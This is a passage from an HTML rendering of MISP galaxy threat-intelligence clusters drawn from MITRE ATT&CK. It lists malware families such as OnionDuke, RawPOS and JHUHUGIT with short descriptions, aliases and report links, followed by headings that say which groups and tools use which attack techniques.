<p>OnionDuke is malware that was used by APT29 from 2013 to 2015. (Citation: F-Secure The Dukes)</p>
</div>
<div class="paragraph">
<p>Aliases: OnionDuke</p>
</div>
<div class="paragraph">
<p>OnionDuke - S0052 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>OnionDuke</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1114. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0052">https://attack.mitre.org/wiki/Software/S0052</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.f-secure.com/documents/996508/1030745/dukes%20whitepaper.pdf">https://www.f-secure.com/documents/996508/1030745/dukes%20whitepaper.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_lowball_s0042"><a class="anchor" href="#_lowball_s0042"></a><a class="link" href="#_lowball_s0042">LOWBALL - S0042</a></h3>
<div class="paragraph">
<p>LOWBALL is malware used by admin@338. It was used in August 2015 in email messages targeting Hong Kong-based media organizations. (Citation: FireEye admin@338)</p>
</div>
<div class="paragraph">
<p>Aliases: LOWBALL</p>
</div>
<div class="paragraph">
<p>LOWBALL - S0042 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>LOWBALL</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1115. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0042">https://attack.mitre.org/wiki/Software/S0042</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html">https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_blackcoffee_s0069"><a class="anchor" href="#_blackcoffee_s0069"></a><a class="link" href="#_blackcoffee_s0069">BLACKCOFFEE - S0069</a></h3>
<div class="paragraph">
<p>BLACKCOFFEE is malware that has been used by APT17 since at least 2013. (Citation: FireEye APT17)</p>
</div>
<div class="paragraph">
<p>Aliases: BLACKCOFFEE</p>
</div>
<div class="paragraph">
<p>BLACKCOFFEE - S0069 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>BLACKCOFFEE</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1116. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0069">https://attack.mitre.org/wiki/Software/S0069</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www2.fireeye.com/rs/fireye/images/APT17%20Report.pdf">https://www2.fireeye.com/rs/fireye/images/APT17%20Report.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_derusbi_s0021"><a class="anchor" href="#_derusbi_s0021"></a><a class="link" href="#_derusbi_s0021">Derusbi - S0021</a></h3>
<div class="paragraph">
<p>Derusbi is malware used by multiple Chinese APT groups. (Citation: Axiom) (Citation: ThreatConnect Anthem) Both Windows and Linux variants have been observed. (Citation: Fidelis Turbo)</p>
</div>
<div class="paragraph">
<p>Aliases: Derusbi</p>
</div>
<div class="paragraph">
<p>Derusbi - S0021 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Derusbi</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1117. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0021">https://attack.mitre.org/wiki/Software/S0021</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.novetta.com/wp-content/uploads/2014/11/Executive%20Summary-Final%201.pdf">http://www.novetta.com/wp-content/uploads/2014/11/Executive%20Summary-Final%201.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/">https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fidelissecurity.com/sites/default/files/TA%20Fidelis%20Turbo%201602%200.pdf">https://www.fidelissecurity.com/sites/default/files/TA%20Fidelis%20Turbo%201602%200.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_rawpos_s0169"><a class="anchor" href="#_rawpos_s0169"></a><a class="link" href="#_rawpos_s0169">RawPOS - S0169</a></h3>
<div class="paragraph">
<p>RawPOS is a point-of-sale (POS) malware family that searches for cardholder data on victims. It has been in use since at least 2008. (Citation: Kroll RawPOS Jan 2017) (Citation: TrendMicro RawPOS April 2015) (Citation: Visa RawPOS March 2015) FireEye divides RawPOS into three components: FIENDCRY, DUEBREW, and DRIFTWOOD. (Citation: Mandiant FIN5 GrrCON Oct 2016) (Citation: DarkReading FireEye FIN5 Oct 2015)</p>
</div>
<div class="paragraph">
<p>Aliases: RawPOS, FIENDCRY, DUEBREW, DRIFTWOOD</p>
</div>
<div class="paragraph">
<p>Contributors: Walker Johnson</p>
</div>
<div class="paragraph">
<p>RawPOS - S0169 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>RawPOS</p>
</li>
<li>
<p>FIENDCRY</p>
</li>
<li>
<p>DUEBREW</p>
</li>
<li>
<p>DRIFTWOOD</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1118. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0169">https://attack.mitre.org/wiki/Software/S0169</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://usa.visa.com/dam/VCOM/download/merchants/alert-rawpos.pdf">https://usa.visa.com/dam/VCOM/download/merchants/alert-rawpos.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.youtube.com/watch?v=fevGZs0EQu8">https://www.youtube.com/watch?v=fevGZs0EQu8</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.darkreading.com/analytics/prolific-cybercrime-gang-favors-legit-login-credentials/d/d-id/1322645?">https://www.darkreading.com/analytics/prolific-cybercrime-gang-favors-legit-login-credentials/d/d-id/1322645?</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_epic_s0091"><a class="anchor" href="#_epic_s0091"></a><a class="link" href="#_epic_s0091">Epic - S0091</a></h3>
<div class="paragraph">
<p>Epic is a backdoor that has been used by Turla. (Citation: Kaspersky Turla)</p>
</div>
<div class="paragraph">
<p>Aliases: Epic, Tavdig, Wipbot, WorldCupSec, TadjMakhal</p>
</div>
<div class="paragraph">
<p>Epic - S0091 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Epic</p>
</li>
<li>
<p>Tavdig</p>
</li>
<li>
<p>Wipbot</p>
</li>
<li>
<p>WorldCupSec</p>
</li>
<li>
<p>TadjMakhal</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1119. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0091">https://attack.mitre.org/wiki/Software/S0091</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/the-epic-turla-operation/65545/">https://securelist.com/the-epic-turla-operation/65545/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_lurid_s0010"><a class="anchor" href="#_lurid_s0010"></a><a class="link" href="#_lurid_s0010">Lurid - S0010</a></h3>
<div class="paragraph">
<p>Lurid is a malware family that has been used by several groups, including PittyTiger, in targeted attacks as far back as 2006. (Citation: Villeneuve 2014) (Citation: Villeneuve 2011)</p>
</div>
<div class="paragraph">
<p>Aliases: Lurid, Enfal</p>
</div>
<div class="paragraph">
<p>Lurid - S0010 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Lurid</p>
</li>
<li>
<p>Enfal</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1120. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0010">https://attack.mitre.org/wiki/Software/S0010</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2014/07/spy-of-the-tiger.html">https://www.fireeye.com/blog/threat-research/2014/07/spy-of-the-tiger.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp%20dissecting-lurid-apt.pdf">http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp%20dissecting-lurid-apt.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_3para_rat_s0066"><a class="anchor" href="#_3para_rat_s0066"></a><a class="link" href="#_3para_rat_s0066">3PARA RAT - S0066</a></h3>
<div class="paragraph">
<p>3PARA RAT is a remote access tool (RAT) programmed in C++ that has been used by Putter Panda. (Citation: CrowdStrike Putter Panda)</p>
</div>
<div class="paragraph">
<p>Aliases: 3PARA RAT</p>
</div>
<div class="paragraph">
<p>3PARA RAT - S0066 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>3PARA RAT</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1121. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0066">https://attack.mitre.org/wiki/Software/S0066</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf">http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_jhuhugit_s0044"><a class="anchor" href="#_jhuhugit_s0044"></a><a class="link" href="#_jhuhugit_s0044">JHUHUGIT - S0044</a></h3>
<div class="paragraph">
<p>JHUHUGIT is malware used by APT28. It is based on Carberp source code and serves as reconnaissance malware. (Citation: Kaspersky Sofacy) (Citation: F-Secure Sofacy 2015) (Citation: ESET Sednit Part 1) (Citation: FireEye APT28 January 2017)</p>
</div>
<div class="paragraph">
<p>Aliases: JHUHUGIT, Seduploader, JKEYSKW, Sednit, GAMEFISH</p>
</div>
<div class="paragraph">
<p>JHUHUGIT - S0044 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>JHUHUGIT</p>
</li>
<li>
<p>Seduploader</p>
</li>
<li>
<p>JKEYSKW</p>
</li>
<li>
<p>Sednit</p>
</li>
<li>
<p>GAMEFISH</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1122. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0044">https://attack.mitre.org/wiki/Software/S0044</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/">https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://labsblog.f-secure.com/2015/09/08/sofacy-recycles-carberp-and-metasploit-code/">https://labsblog.f-secure.com/2015/09/08/sofacy-recycles-carberp-and-metasploit-code/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part1.pdf">http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part1.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf">https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_elmer_s0064"><a class="anchor" href="#_elmer_s0064"></a><a class="link" href="#_elmer_s0064">ELMER - S0064</a></h3>
<div class="paragraph">
<p>ELMER is a non-persistent, proxy-aware HTTP backdoor written in Delphi that has been used by APT16. (Citation: FireEye EPS Awakens Part 2)</p>
</div>
<div class="paragraph">
<p>Aliases: ELMER</p>
</div>
<div class="paragraph">
<p>ELMER - S0064 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>ELMER</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1123. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0064">https://attack.mitre.org/wiki/Software/S0064</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html">https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html</a></p></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="sect1">
<h2 id="_enterprise_attack_relationship"><a class="anchor" href="#_enterprise_attack_relationship"></a><a class="link" href="#_enterprise_attack_relationship">Enterprise Attack - Relationship</a></h2>
<div class="sectionbody">
<div class="paragraph">
<p>MITRE Relationship.</p>
</div>
<div class="admonitionblock note">
<table>
<tr>
<td class="icon">
<i class="fa icon-note" title="Note"></i>
</td>
<td class="content">
Enterprise Attack - Relationship is a cluster galaxy available in JSON format at <a href="https://github.com/MISP/misp-galaxy/blob/master/clusters/enterprise" class="bare">https://github.com/MISP/misp-galaxy/blob/master/clusters/enterprise</a> attack - relationship.json[<strong>this location</strong>] The JSON format can be freely reused in your application or automatically enabled in <a href="https://www.github.com/MISP/MISP">MISP</a>.
</td>
</tr>
</table>
</div>
<div class="dlist">
<dl>
<dt class="hdlist1">authors</dt>
<dd>
<p>MITRE</p>
</dd>
</dl>
</div>
<div class="sect2">
<h3 id="_menupass_g0045_uses_evilgrab_s0152"><a class="anchor" href="#_menupass_g0045_uses_evilgrab_s0152"></a><a class="link" href="#_menupass_g0045_uses_evilgrab_s0152">menuPass (G0045) uses EvilGrab (S0152)</a></h3>
</div>
<div class="sect2">
<h3 id="_remsec_s0125_uses_security_software_discovery_t1063"><a class="anchor" href="#_remsec_s0125_uses_security_software_discovery_t1063"></a><a class="link" href="#_remsec_s0125_uses_security_software_discovery_t1063">Remsec (S0125) uses Security Software Discovery (T1063)</a></h3>
</div>
<div class="sect2">
<h3 id="_seasharpee_s0185_uses_remote_file_copy_t1105"><a class="anchor" href="#_seasharpee_s0185_uses_remote_file_copy_t1105"></a><a class="link" href="#_seasharpee_s0185_uses_remote_file_copy_t1105">SEASHARPEE (S0185) uses Remote File Copy (T1105)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt3_g0022_uses_command_line_interface_t1059"><a class="anchor" href="#_apt3_g0022_uses_command_line_interface_t1059"></a><a class="link" href="#_apt3_g0022_uses_command_line_interface_t1059">APT3 (G0022) uses Command-Line Interface (T1059)</a></h3>
</div>
<div class="sect2">
<h3 id="_cherry_picker_s0107_uses_exfiltration_over_alternative_protocol_t1048"><a class="anchor" href="#_cherry_picker_s0107_uses_exfiltration_over_alternative_protocol_t1048"></a><a class="link" href="#_cherry_picker_s0107_uses_exfiltration_over_alternative_protocol_t1048">Cherry Picker (S0107) uses Exfiltration Over Alternative Protocol (T1048)</a></h3>
</div>
<div class="sect2">
<h3 id="_shamoon_s0140_uses_file_and_directory_discovery_t1083"><a class="anchor" href="#_shamoon_s0140_uses_file_and_directory_discovery_t1083"></a><a class="link" href="#_shamoon_s0140_uses_file_and_directory_discovery_t1083">Shamoon (S0140) uses File and Directory Discovery (T1083)</a></h3>
</div>
<div class="sect2">
<h3 id="_bronze_butler_g0060_uses_pass_the_ticket_t1097"><a class="anchor" href="#_bronze_butler_g0060_uses_pass_the_ticket_t1097"></a><a class="link" href="#_bronze_butler_g0060_uses_pass_the_ticket_t1097">BRONZE BUTLER (G0060) uses Pass the Ticket (T1097)</a></h3>
</div>
<div class="sect2">
<h3 id="_oilrig_g0049_uses_remote_services_t1021"><a class="anchor" href="#_oilrig_g0049_uses_remote_services_t1021"></a><a class="link" href="#_oilrig_g0049_uses_remote_services_t1021">OilRig (G0049) uses Remote Services (T1021)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt28_g0007_uses_remote_file_copy_t1105"><a class="anchor" href="#_apt28_g0007_uses_remote_file_copy_t1105"></a><a class="link" href="#_apt28_g0007_uses_remote_file_copy_t1105">APT28 (G0007) uses Remote File Copy (T1105)</a></h3>
</div>
<div class="sect2">
<h3 id="_remsec_s0125_uses_standard_application_layer_protocol_t1071"><a class="anchor" href="#_remsec_s0125_uses_standard_application_layer_protocol_t1071"></a><a class="link" href="#_remsec_s0125_uses_standard_application_layer_protocol_t1071">Remsec (S0125) uses Standard Application Layer Protocol (T1071)</a></h3>
</div>
<div class="sect2">
<h3 id="_isminjector_s0189_uses_scheduled_task_t1053"><a class="anchor" href="#_isminjector_s0189_uses_scheduled_task_t1053"></a><a class="link" href="#_isminjector_s0189_uses_scheduled_task_t1053">ISMInjector (S0189) uses Scheduled Task (T1053)</a></h3>
</div>
<div class="sect2">
<h3 id="_evilgrab_s0152_uses_audio_capture_t1123"><a class="anchor" href="#_evilgrab_s0152_uses_audio_capture_t1123"></a><a class="link" href="#_evilgrab_s0152_uses_audio_capture_t1123">EvilGrab (S0152) uses Audio Capture (T1123)</a></h3>
</div>
<div class="sect2">
<h3 id="_magic_hound_g0059_uses_remote_file_copy_t1105"><a class="anchor" href="#_magic_hound_g0059_uses_remote_file_copy_t1105"></a><a class="link" href="#_magic_hound_g0059_uses_remote_file_copy_t1105">Magic Hound (G0059) uses Remote File Copy (T1105)</a></h3>
</div>
<div class="sect2">
<h3 id="_fin6_g0037_uses_remote_desktop_protocol_t1076"><a class="anchor" href="#_fin6_g0037_uses_remote_desktop_protocol_t1076"></a><a class="link" href="#_fin6_g0037_uses_remote_desktop_protocol_t1076">FIN6 (G0037) uses Remote Desktop Protocol (T1076)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt34_g0057_uses_net_s0039"><a class="anchor" href="#_apt34_g0057_uses_net_s0039"></a><a class="link" href="#_apt34_g0057_uses_net_s0039">APT34 (G0057) uses Net (S0039)</a></h3>
</div>
<div class="sect2">
<h3 id="_miniduke_s0051_uses_fallback_channels_t1008"><a class="anchor" href="#_miniduke_s0051_uses_fallback_channels_t1008"></a><a class="link" href="#_miniduke_s0051_uses_fallback_channels_t1008">MiniDuke (S0051) uses Fallback Channels (T1008)</a></h3>
</div>
<div class="sect2">
<h3 id="_ke3chang_g0004_uses_ipconfig_s0100"><a class="anchor" href="#_ke3chang_g0004_uses_ipconfig_s0100"></a><a class="link" href="#_ke3chang_g0004_uses_ipconfig_s0100">Ke3chang (G0004) uses ipconfig (S0100)</a></h3>
</div>
<div class="sect2">
<h3 id="_group5_g0043_uses_input_capture_t1056"><a class="anchor" href="#_group5_g0043_uses_input_capture_t1056"></a><a class="link" href="#_group5_g0043_uses_input_capture_t1056">Group5 (G0043) uses Input Capture (T1056)</a></h3>
</div>
<div class="sect2">
<h3 id="_sandworm_team_g0034_uses_blackenergy_s0089"><a class="anchor" href="#_sandworm_team_g0034_uses_blackenergy_s0089"></a><a class="link" href="#_sandworm_team_g0034_uses_blackenergy_s0089">Sandworm Team (G0034) uses BlackEnergy (S0089)</a></h3>
</div>
<div class="sect2">
<h3 id="_advstoreshell_s0045_uses_obfuscated_files_or_information_t1027"><a class="anchor" href="#_advstoreshell_s0045_uses_obfuscated_files_or_information_t1027"></a><a class="link" href="#_advstoreshell_s0045_uses_obfuscated_files_or_information_t1027">ADVSTORESHELL (S0045) uses Obfuscated Files or Information (T1027)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt32_g0050_uses_soundbite_s0157"><a class="anchor" href="#_apt32_g0050_uses_soundbite_s0157"></a><a class="link" href="#_apt32_g0050_uses_soundbite_s0157">APT32 (G0050) uses SOUNDBITE (S0157)</a></h3>
</div>
<div class="sect2">
<h3 id="_winmm_s0059_uses_fallback_channels_t1008"><a class="anchor" href="#_winmm_s0059_uses_fallback_channels_t1008"></a><a class="link" href="#_winmm_s0059_uses_fallback_channels_t1008">WinMM (S0059) uses Fallback Channels (T1008)</a></h3>
</div>
<div class="sect2">
<h3 id="_downpaper_s0186_uses_query_registry_t1012"><a class="anchor" href="#_downpaper_s0186_uses_query_registry_t1012"></a><a class="link" href="#_downpaper_s0186_uses_query_registry_t1012">DownPaper (S0186) uses Query Registry (T1012)</a></h3>
</div>
<div class="sect2">
<h3 id="_third_party_software_mitigation_t1072_mitigates_third_party_software_t1072"><a class="anchor" href="#_third_party_software_mitigation_t1072_mitigates_third_party_software_t1072"></a><a class="link" href="#_third_party_software_mitigation_t1072_mitigates_third_party_software_t1072">Third-party Software Mitigation (T1072) mitigates Third-party Software (T1072)</a></h3>
</div>
<div class="sect2">
<h3 id="_textmate_s0146_uses_standard_application_layer_protocol_t1071"><a class="anchor" href="#_textmate_s0146_uses_standard_application_layer_protocol_t1071"></a><a class="link" href="#_textmate_s0146_uses_standard_application_layer_protocol_t1071">TEXTMATE (S0146) uses Standard Application Layer Protocol (T1071)</a></h3>
</div>
<div class="sect2">
<h3 id="_deep_panda_g0009_uses_indicator_removal_from_tools_t1066"><a class="anchor" href="#_deep_panda_g0009_uses_indicator_removal_from_tools_t1066"></a><a class="link" href="#_deep_panda_g0009_uses_indicator_removal_from_tools_t1066">Deep Panda (G0009) uses Indicator Removal from Tools (T1066)</a></h3>
</div>
<div class="sect2">
<h3 id="_magic_hound_g0059_uses_registry_run_keys_start_folder_t1060"><a class="anchor" href="#_magic_hound_g0059_uses_registry_run_keys_start_folder_t1060"></a><a class="link" href="#_magic_hound_g0059_uses_registry_run_keys_start_folder_t1060">Magic Hound (G0059) uses Registry Run Keys / Start Folder (T1060)</a></h3>
</div>
<div class="sect2">
<h3 id="_execution_through_module_load_mitigation_t1129_mitigates_execution_through_module_load_t1129"><a class="anchor" href="#_execution_through_module_load_mitigation_t1129_mitigates_execution_through_module_load_t1129"></a><a class="link" href="#_execution_through_module_load_mitigation_t1129_mitigates_execution_through_module_load_t1129">Execution through Module Load Mitigation (T1129) mitigates Execution through Module Load (T1129)</a></h3>
</div>
<div class="sect2">
<h3 id="_backspace_s0031_uses_shortcut_modification_t1023"><a class="anchor" href="#_backspace_s0031_uses_shortcut_modification_t1023"></a><a class="link" href="#_backspace_s0031_uses_shortcut_modification_t1023">BACKSPACE (S0031) uses Shortcut Modification (T1023)</a></h3>
</div>
<div class="sect2">
<h3 id="_riptide_s0003_uses_commonly_used_port_t1043"><a class="anchor" href="#_riptide_s0003_uses_commonly_used_port_t1043"></a><a class="link" href="#_riptide_s0003_uses_commonly_used_port_t1043">RIPTIDE (S0003) uses Commonly Used Port (T1043)</a></h3>
</div>
<div class="sect2">
<h3 id="_scarlet_mimic_g0029_uses_callme_s0077"><a class="anchor" href="#_scarlet_mimic_g0029_uses_callme_s0077"></a><a class="link" href="#_scarlet_mimic_g0029_uses_callme_s0077">Scarlet Mimic (G0029) uses CallMe (S0077)</a></h3>
</div>
<div class="sect2">
<h3 id="_fin6_g0037_uses_valid_accounts_t1078"><a class="anchor" href="#_fin6_g0037_uses_valid_accounts_t1078"></a><a class="link" href="#_fin6_g0037_uses_valid_accounts_t1078">FIN6 (G0037) uses Valid Accounts (T1078)</a></h3>
</div>
<div class="sect2">
<h3 id="_gh0st_s0032_uses_file_deletion_t1107"><a class="anchor" href="#_gh0st_s0032_uses_file_deletion_t1107"></a><a class="link" href="#_gh0st_s0032_uses_file_deletion_t1107">gh0st (S0032) uses File Deletion (T1107)</a></h3>
</div>
<div class="sect2">
<h3 id="_rawpos_s0169_uses_new_service_t1050"><a class="anchor" href="#_rawpos_s0169_uses_new_service_t1050"></a><a class="link" href="#_rawpos_s0169_uses_new_service_t1050">RawPOS (S0169) uses New Service (T1050)</a></h3>
</div>
<div class="sect2">
<h3 id="_lazarus_group_g0032_uses_remote_file_copy_t1105"><a class="anchor" href="#_lazarus_group_g0032_uses_remote_file_copy_t1105"></a><a class="link" href="#_lazarus_group_g0032_uses_remote_file_copy_t1105">Lazarus Group (G0032) uses Remote File Copy (T1105)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt28_g0007_uses_pass_the_hash_t1075"><a class="anchor" href="#_apt28_g0007_uses_pass_the_hash_t1075"></a><a class="link" href="#_apt28_g0007_uses_pass_the_hash_t1075">APT28 (G0007) uses Pass the Hash (T1075)</a></h3>
</div>
<div class="sect2">
<h3 id="_flame_s0143_uses_exploitation_of_vulnerability_t1068"><a class="anchor" href="#_flame_s0143_uses_exploitation_of_vulnerability_t1068"></a><a class="link" href="#_flame_s0143_uses_exploitation_of_vulnerability_t1068">Flame (S0143) uses Exploitation of Vulnerability (T1068)</a></h3>
</div>
<div class="sect2">
<h3 id="_stealth_falcon_g0038_uses_system_network_configuration_discovery_t1016"><a class="anchor" href="#_stealth_falcon_g0038_uses_system_network_configuration_discovery_t1016"></a><a class="link" href="#_stealth_falcon_g0038_uses_system_network_configuration_discovery_t1016">Stealth Falcon (G0038) uses System Network Configuration Discovery (T1016)</a></h3>
</div>
<div class="sect2">
<h3 id="_darkhotel_g0012_uses_taint_shared_content_t1080"><a class="anchor" href="#_darkhotel_g0012_uses_taint_shared_content_t1080"></a><a class="link" href="#_darkhotel_g0012_uses_taint_shared_content_t1080">Darkhotel (G0012) uses Taint Shared Content (T1080)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt3_g0022_uses_file_and_directory_discovery_t1083"><a class="anchor" href="#_apt3_g0022_uses_file_and_directory_discovery_t1083"></a><a class="link" href="#_apt3_g0022_uses_file_and_directory_discovery_t1083">APT3 (G0022) uses File and Directory Discovery (T1083)</a></h3>
</div>
<div class="sect2">
<h3 id="_streamex_s0142_uses_file_and_directory_discovery_t1083"><a class="anchor" href="#_streamex_s0142_uses_file_and_directory_discovery_t1083"></a><a class="link" href="#_streamex_s0142_uses_file_and_directory_discovery_t1083">StreamEx (S0142) uses File and Directory Discovery (T1083)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt34_g0057_uses_valid_accounts_t1078"><a class="anchor" href="#_apt34_g0057_uses_valid_accounts_t1078"></a><a class="link" href="#_apt34_g0057_uses_valid_accounts_t1078">APT34 (G0057) uses Valid Accounts (T1078)</a></h3>
</div>
<div class="sect2">
<h3 id="_data_compressed_mitigation_t1002_mitigates_data_compressed_t1002"><a class="anchor" href="#_data_compressed_mitigation_t1002_mitigates_data_compressed_t1002"></a><a class="link" href="#_data_compressed_mitigation_t1002_mitigates_data_compressed_t1002">Data Compressed Mitigation (T1002) mitigates Data Compressed (T1002)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt32_g0050_uses_valid_accounts_t1078"><a class="anchor" href="#_apt32_g0050_uses_valid_accounts_t1078"></a><a class="link" href="#_apt32_g0050_uses_valid_accounts_t1078">APT32 (G0050) uses Valid Accounts (T1078)</a></h3>
</div>
<div class="sect2">
<h3 id="_lazarus_group_g0032_uses_registry_run_keys_start_folder_t1060"><a class="anchor" href="#_lazarus_group_g0032_uses_registry_run_keys_start_folder_t1060"></a><a class="link" href="#_lazarus_group_g0032_uses_registry_run_keys_start_folder_t1060">Lazarus Group (G0032) uses Registry Run Keys / Start Folder (T1060)</a></h3>
</div>
<div class="sect2">
